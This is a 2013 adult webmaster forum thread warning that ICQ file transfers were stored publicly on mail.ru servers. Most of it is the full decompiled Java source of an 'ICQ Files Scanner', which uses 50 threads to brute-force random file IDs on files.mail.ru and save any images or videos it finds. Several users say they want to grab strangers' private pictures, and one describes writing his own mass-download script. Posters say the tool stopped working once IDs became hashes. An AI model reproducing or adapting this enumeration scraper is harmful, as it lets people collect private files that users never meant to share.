GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Sending files via ICQ? You're fucked! (https://gfy.com/showthread.php?t=1096073)

just a punk 01-12-2013 03:36 AM
Sending files via ICQ? You're fucked!
 
Read this: http://translate.google.com/translat...s%2F6239 5%2F

This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385

You've been warned (many times already actually).

facialfreak 01-12-2013 07:54 AM
Yep... People need to learn the basics in online security NOW!!

The days of 'bank robbers' and 'vinyl siding/home reno salesmen' are quickly disappearing!! It is much simpler to scam people online!

If you do not know how to protect yourself .... then NOW is the time to ask somebody who does! :thumbsup

marlboroack 01-12-2013 09:28 AM
So i guess you're double fucked if you have a mac?

just a punk 01-12-2013 10:09 AM
It does not matter what you have. Avery file you send via ICQ is being uploaded to the mail.ru servers and becomes available for everyone.

$5 submissions 01-13-2013 10:11 PM
Man, that's rough. Thanks for this: This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385

rowan 01-13-2013 10:18 PM
Speaking of security, I thought we'd all disabled Java.

Dirty F 01-13-2013 10:27 PM
I have no clue what all of this means. I simply want to see all these private pictures. How do i do that?

CYF 01-13-2013 10:53 PM
Quote:
Originally Posted by Dirty F (Post 19423721)
I have no clue what all of this means. I simply want to see all these private pictures. How do i do that?
I wrote a bash script to download everything.... but I'm getting a 404. Even for files they posted in the example image which should work.

Maybe the java has something that I'm missing, but I'm not about to run a .jar from an unknown rusian source :)

Dirty F 01-13-2013 11:07 PM
Once it works may i use it?

Dirty F 01-13-2013 11:07 PM
Or simply share the download with me :)

just a punk 01-14-2013 04:13 AM
Quote:
Originally Posted by rowan (Post 19423715)
Speaking of security, I thought we'd all disabled Java.
This has nothing to do with Java.

just a punk 01-14-2013 04:19 AM
Quote:
Originally Posted by CYF (Post 19423741)
I wrote a bash script to download everything.... but I'm getting a 404. Even for files they posted in the example image which should work.

Maybe the java has something that I'm missing, but I'm not about to run a .jar from an unknown rusian source :)
If you'd spent a bit more time for reading, you would find the source of that Java app "from an unknown Russian source", which is located here: http://pastebin.com/n1qpNM4y. There are no backdoors in it so you can compile and run it by yourself.

However AFAIK it doesn't work anymore because mail.ru has moved all files to another location and they are 404 now... after they already leaked into the public. "Good job".

just a punk 01-14-2013 04:30 AM
Quote:
Originally Posted by $5 submissions (Post 19423711)
Man, that's rough. Thanks for this: This is a simple JAR which parses the ICQ db for image files: http://rghost.net/42926385
I didn't get it. What exactly is "rough" there? Java is not an .exe and it's easy to reverse (de-compile). If you think there is a virus in some Java app, why don't you just check it here: http://www.showmycode.com/? That's so fuckin' simple and can be done even by a kid :2 cents:

Here is the REVERSED contents of that jar:

IFS.class
Code:
import java.io.PrintStream;
import java.util.Random;

public class IFS
{
    /* member class not found */
    class MyRunnable {}


    public IFS()
    {
    }

    public static void main(String args[])
    {
        System.out.println("ICQ Files Scanner 0.3");
        for(int i = 0; i < 50; i++)
            (new Thread(new MyRunnable(i))).start();

    }

    public static String generateString(Random random, String s, int i)
    {
        char ac[] = new char[i];
        for(int j = 0; j < i; j++)
            ac[j] = s.charAt(random.nextInt(s.length()));

        return new String(ac);
    }

    private static final int THREADS = 50;
}
IFS$MyRunnable.class
Code:
import java.io.*;
import java.net.*;
import java.util.Random;

private static class mThreadId
    implements Runnable
{

    public void run()
    {
        File file = new File("out");
        file.mkdirs();
        String s = String.format("ifs%d.txt", new Object[] {
            Integer.valueOf(mThreadId)
        });
        do
        {
            mTotal++;
            String s1 = IFS.generateString(random, "1234567890QWERTYUIOPASDFGHJKLZXCVBNM", 6);
            String s2 = String.format("http://files.mail.ru/%s", new Object[] {
                s1
            });
            try
            {
                URL url = new URL(s2);
                URLConnection urlconnection = url.openConnection();
                urlconnection.connect();
                urlconnection.getContent();
                String s3 = urlconnection.getContentType();
                int i = urlconnection.getContentLength();
                String s4 = "done    ";
                if(i != 4189)
                {
                    if("image/jpeg".equals(s3))
                    {
                        File file1 = new File("out", (new StringBuilder()).append(s1).append(".jpg").toString());
                        saveBinaryFile(urlconnection, i, url, file1);
                    } else
                    if("image/tiff".equals(s3))
                    {
                        File file2 = new File("out", (new StringBuilder()).append(s1).append(".tiff").toString());
                        saveBinaryFile(urlconnection, i, url, file2);
                    } else
                    if("image/x-ms-bmp".equals(s3))
                    {
                        File file3 = new File("out", (new StringBuilder()).append(s1).append(".bmp").toString());
                        saveBinaryFile(urlconnection, i, url, file3);
                    } else
                    if("image/png".equals(s3))
                    {
                        File file4 = new File("out", (new StringBuilder()).append(s1).append(".png").toString());
                        saveBinaryFile(urlconnection, i, url, file4);
                    } else
                    if("image/gif".equals(s3))
                    {
                        File file5 = new File("out", (new StringBuilder()).append(s1).append(".gif").toString());
                        saveBinaryFile(urlconnection, i, url, file5);
                    } else
                    {
                        File file6 = new File("out", (new StringBuilder()).append(s1).append(".mpg").toString());
                        saveBinaryFile(urlconnection, i, url, file6);
                    }
                } else
                {
                    s4 = "not found";
                }
                mSuccess++;
                double d = mSuccess / mTotal;
                String s5 = String.format("(%d) %s %d/%d=%f %s %d %s", new Object[] {
                    Integer.valueOf(mThreadId), s4, Integer.valueOf(mSuccess), Integer.valueOf(mTotal), Double.valueOf(d), s3, Integer.valueOf(i), s2
                });
                System.out.println(s5);
                writeToFile(s, s5);
            }
            catch(MalformedURLException malformedurlexception)
            {
                System.out.println(String.format("(%d) %s", new Object[] {
                    Integer.valueOf(mThreadId), malformedurlexception.getMessage()
                }));
            }
            catch(FileNotFoundException filenotfoundexception) { }
            catch(IOException ioexception)
            {
                System.out.println(String.format("(%d) %s", new Object[] {
                    Integer.valueOf(mThreadId), ioexception.getMessage()
                }));
            }
        } while(true);
    }

    private void saveBinaryFile(URLConnection urlconnection, int i, URL url, File file)
        throws IOException
    {
        InputStream inputstream = urlconnection.getInputStream();
        BufferedInputStream bufferedinputstream = new BufferedInputStream(inputstream);
        byte abyte0[] = new byte[i];
        boolean flag = false;
        int k = 0;
        do
        {
            if(k >= i)
                break;
            int j = bufferedinputstream.read(abyte0, k, abyte0.length - k);
            if(j == -1)
                break;
            k += j;
        } while(true);
        bufferedinputstream.close();
        if(k != i)
        {
            throw new IOException((new StringBuilder()).append("Only read ").append(k).append(" bytes; Expected ").append(i).append(" bytes").toString());
        } else
        {
            FileOutputStream fileoutputstream = new FileOutputStream(file);
            fileoutputstream.write(abyte0);
            fileoutputstream.flush();
            fileoutputstream.close();
            return;
        }
    }

    private void writeToFile(String s, String s1)
    {
        BufferedWriter bufferedwriter;
        Object obj = null;
        bufferedwriter = null;
        FileWriter filewriter = new FileWriter(s, true);
        bufferedwriter = new BufferedWriter(filewriter);
        bufferedwriter.append(s1);
        bufferedwriter.newLine();
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception) { }
        break MISSING_BLOCK_LABEL_128;
        IOException ioexception1;
        ioexception1;
        System.out.println(String.format("(%d) %s", new Object[] {
            Integer.valueOf(mThreadId), ioexception1.getMessage()
        }));
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception2) { }
        break MISSING_BLOCK_LABEL_128;
        Exception exception;
        exception;
        try
        {
            if(bufferedwriter != null)
                bufferedwriter.close();
        }
        catch(IOException ioexception3) { }
        throw exception;
    }

    private static final String CHARS = "1234567890QWERTYUIOPASDFGHJKLZXCVBNM";
    private static final int ID_LENGTH = 6;
    private static final String STR_MESSAGE = "(%d) %s";
    private static final String STR_SUCCESS = "(%d) %s %d/%d=%f %s %d %s";
    private static final String FILE_NAME = "ifs%d.txt";
    private static final String URL = "http://files.mail.ru/%s";
    private static final int MAX_SIZE = 0x6400000;
    private final Random random = new Random();
    private final int mThreadId;
    private int mSuccess;
    private int mTotal;

    public tion(int i)
    {
        mSuccess = 0;
        mTotal = 0;
        mThreadId = i;
    }
}
Some people afraid of even their own shadow :2 cents:

P.S. You are too late because it doesn't work anymore :pimp

ZeroHero 01-14-2013 06:34 AM
many thanks for this

BIGTYMER 01-14-2013 06:39 AM
What is the mail.ru connection? Does ICQ and mail.ru have the same owner?

just a punk 01-14-2013 07:58 AM
ICQ is an instant messaging computer program that was first developed and popularized by the Israeli company Mirabilis, then bought by America Online, and since April 2010 owned by Mail.ru Group.More...

And yes, they mail.ru and icq.com have the same owner and they share the same servers.

Once again, the problem is following. Before 2010 ICQ was using P2P protocol to transfer a file between two clients. Now ALL files you send to someone over ICQ go the mail.ru servers whey they get stored permanently and are openly available to any 3rd person.

For example: http://files.icq.net/files/get?fileId=E132656500FC40E99DC98575E53616D5 (mail.ru alias: http://files.mail.ru/files/get?fileId=E132656500FC40E99DC98575E53616D5) is a file which was sent from one ICQ client to another one.

They just replaced 6-byte file ID's by 16-byte hashes (this is why that Java scanner doesn't work anymore) but the security problem was not fixed. The files you send via ICQ aren't safe. Everything you did send now stored at mail.ru servers without any protection.

1) They are collecting your data.
2) They do not protect it from others.

Do you see what I mean now?

Tom_PM 01-14-2013 09:11 AM
So that picture someone sent me of a cat who fell asleep in it's bowl of food is being seen by everyone? Ohmygod :)

JamesM 01-14-2013 10:04 AM
pretty bad move, storing public data on servers and can be easily accessible to anyone with internet.

just a punk 01-14-2013 11:34 AM
Quote:
Originally Posted by PR_Tom (Post 19424270)
So that picture someone sent me of a cat who fell asleep in it's bowl of food is being seen by everyone? Ohmygod :)
So you don't use ICQ for the work purposes? Good for you.

Supz 01-14-2013 11:38 AM
I am not sure why adult webmasters and russian spammers are still the only people using ICQ. I deleted my icq atleast a year ago. There are much better, secure ways of chatting online.

just a punk 01-14-2013 11:40 AM
Quote:
Originally Posted by Supz (Post 19424528)
There are much better, secure ways of chatting online.
Jabber :2 cents:

Tom_PM 01-14-2013 12:22 PM
Quote:
Originally Posted by CyberSEO (Post 19424521)
So you don't use ICQ for the work purposes? Good for you.
With file sending? Nope. I can't recall a single important work item I've ever sent as a file through ICQ ever. Usually just a funny picture now and then.

just a punk 01-14-2013 03:11 PM
FYI: all your ICQ chat logs are also stored on their servers.

PornDiscounts-V 01-14-2013 04:02 PM
Looks like 35PPS program just got some more verified twitter account images. ;)

rowan 01-14-2013 04:40 PM
Quote:
Originally Posted by CyberSEO (Post 19423913)
This has nothing to do with Java.
I know the issue is not directly related to Java, but I thought it was a little ironic that you pointed towards a Java file on a Russian server only a few days after the hysteria over Java's security started. :thumbsup


All times are GMT -7. The time now is 02:09 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123